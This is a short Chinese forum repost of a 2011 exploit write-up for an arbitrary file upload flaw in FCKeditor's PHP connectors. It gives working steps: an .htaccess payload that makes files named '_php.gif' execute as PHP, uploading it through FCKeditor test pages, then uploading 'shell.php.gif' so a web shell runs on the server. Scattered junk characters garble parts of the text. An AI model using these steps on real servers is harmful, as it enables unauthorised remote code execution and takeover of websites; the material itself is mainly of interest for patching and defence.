FCKeditor所有php版本Upload上传漏洞 作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07 减小字体 增大字体$ @; M4 @" N8 W [+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability [+] Date: 2011* T- L: J* G0 Z [+] Author : sinesafe.cn [+] Website : WwW.sinesafe.cn ——————————————————— 1.create a htaccess file: code: <FilesMatch “_php.gif”> SetHandler application/x-httpd-php* I( b3 ?$ d) L </FilesMatch> " A# d2 V" Y. O, m; N 2.Now upload this htaccess with FCKeditor. http://www.sinesafe.cn/FCKeditor ... er/upload/test.html , Z5 v u7 o* W6 t8 h3 `) Z5 T http://www.sinesafe.cn/FCKeditor ... onnectors/test.html E$ |+ U# a# @- o3 A( P/ N - a7 o; z8 Y/ K- w ———————————————————————————————-" X0 t/ k6 i7 Z1 P" M: g 3.Now upload shell.php.gif with FCKeditor. 4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.. ]+ o3 ^5 C8 i- a 5.http://www.sinesafe.cn/anything/shell_php.gif$ a: F1 r" ]2 S4 ~2 C 6.Now shell is available from server. |
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |